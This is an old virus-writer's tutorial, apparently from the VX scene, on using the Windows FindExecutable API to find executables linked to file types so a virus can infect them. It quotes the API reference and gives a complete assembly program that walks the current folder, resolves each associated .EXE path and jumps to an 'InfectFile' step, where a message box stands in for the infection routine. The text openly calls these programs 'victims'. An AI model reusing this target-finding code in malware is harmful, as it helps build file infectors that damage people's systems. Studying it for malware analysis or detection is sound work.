Find Victims with FindExecutable API [by DiA]
Find Victims with FindExecutable API
by DiA (c)04
www.vx-dia.de.vu - DiA_hates_machine@gmx.de
___________________________________________
___________________________________________
| 1. Intro |
| 2. API Info (from Win32 SDK Reference) |
| 3. Example Code |
| 4. The Results? |
| 5. Outro |
|___________________________________________|
1. Intro
With FindExecutable you can get a full path of a application that manages a file type!
As Examples:
.TXT -> linked with Notepad.EXE
.MP3 -> linked with WinAmp.EXE
.DOC -> linked with Word.EXE
...
Now find with FindExecutable API the linked application, and you have new victims to infect.
Don't know how to explain, see the API Info and the Example Code for better understanding.
2. API Info (from Win32 SDK Reference)
The FindExecutable function retrieves the name and handle to the executable (.EXE) file
associated with the specified filename.
HINSTANCE FindExecutable(
LPCTSTR lpFile, // pointer to string for filename
LPCTSTR lpDirectory,// pointer to string for default directory
LPTSTR lpResult // pointer to buffer for string for executable file on return
);
Parameters
lpFile
Pointer to a null-terminated string specifying a filename. This can be a document or
executable file.
lpDirectory
Pointer to a null-terminated string specifying the default directory.
lpResult
Pointer to a buffer to receive the filename when the function returns. This filename is
a null-terminated string specifying the executable file started when an "open" association
is run on the file specified in the lpFile parameter.
Return Values
If the function succeeds, the return value is greater than 32.
If the function fails, the return value is less than or equal to 32. The following table
lists the possible error values:
Value Meaning
0 The system is out of memory or resources.
31 There is no association for the specified file type.
ERROR_FILE_NOT_FOUND The specified file was not found.
ERROR_PATH_NOT_FOUND The specified path was not found.
ERROR_BAD_FORMAT The .EXE file is invalid (non-Win32 .EXE or error in .EXE
image).
Remarks
When FindExecutable returns, the lpResult parameter may contain the path to the DDE
server started if no server responds to a request to initiate a DDE conversation.
3. Example Code
;-----FindExecutable.asm-----cut------------------------------------------------------------
.386
.model flat
jumps
extrn MessageBoxA :PROC
extrn FindExecutableA :PROC ;to get the linked application
extrn FindFirstFileA :PROC ;search for *.* -> all files
extrn FindNextFileA :PROC
extrn ExitProcess :PROC
.data
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
TargetFile db 260 dup (?) ;save here the full path of victim
FileMask db '*.*',0 ;all files
FindHandle dd 0 ;save the find handle
.code
start:
push offset WIN32_FIND_DATA
push offset FileMask
call FindFirstFileA ;find first file in current folder
mov dword ptr [FindHandle],eax ;save find handle
FindNext:
test eax,eax ;no more filez, exit
jz Ende
push offset TargetFile ;save here full path of victim
push 0 ;current directory
push offset WFD_szFileName ;file to get linked application
call FindExecutableA
cmp eax, 32d ;if <32 there is any error
jb FindNextPhile ;find next file
mov esi,offset TargetFile
call GetPoint ;get point to check extension
inc esi
cmp byte ptr [esi],'E' ;check if linked application
jne CheckAgain ;is a exe
inc esi ;maybe it's linked to .BAT or .PIF
cmp byte ptr [esi],'X'
jne CheckAgain
inc esi
cmp byte ptr [esi],'E'
je InfectFile ;if .EXE infect it
CheckAgain:
mov esi,offset TargetFile
call GetPoint
inc esi
cmp byte ptr [esi],'e' ;check for .exe
jne FindNextPhile
inc esi
cmp byte ptr [esi],'x'
jne FindNextPhile
inc esi
cmp byte ptr [esi],'e'
jne FindNextPhile ;if no .exe find next file
InfectFile:
push 0 ;here the infection routine
push offset WFD_szFileName ;but only a MessageBox to show
push offset TargetFile ;that it works
push 0 ;full path of linked application
call MessageBoxA ;is now in "TargetFile"
FindNextPhile: ;find next file
push offset WIN32_FIND_DATA
push dword ptr [FindHandle] ;via find handle
call FindNextFileA
jmp FindNext ;do it again
Ende:
push 0
call ExitProcess ;exit
GetPoint: ;i love this procedure ;)
cmp byte ptr [esi],'.' ;scan string for "."
jz PointFound
inc esi
jmp GetPoint
PointFound:
ret ;return
end start ;the end...
;-----FindExecutable.asm-----cut------------------------------------------------------------
4. The Results?
If it works how we want it, a new Victim is as string in "TargetFile". Like
"C:\Windows\Notepad.exe" (without the "). But when you search with "*.*" you find also
folders! But not a big problem, because folders are linked with "C:\Windows\Explorer.exe".
If you don't want to infect it again and again only check "TargetFile" for "Explorer.exe".
Another good thing, if "*.*" founds a .EXE it returns the same string.
Example:
WFD_szFileName = C:\Tests\FindExecutableTest.exe
TargetFile = C:\Tests\FindExecutableTest.exe
5. Outro
That's all about the API FindExecutable! Have fun with this and thx for reading! For any
comment's please do a entry in my guestbook (www.vx-dia.de.vu), or mail me to:
DiA_hates_machine@gmx.de
_________________
DiA (c)04 GermanY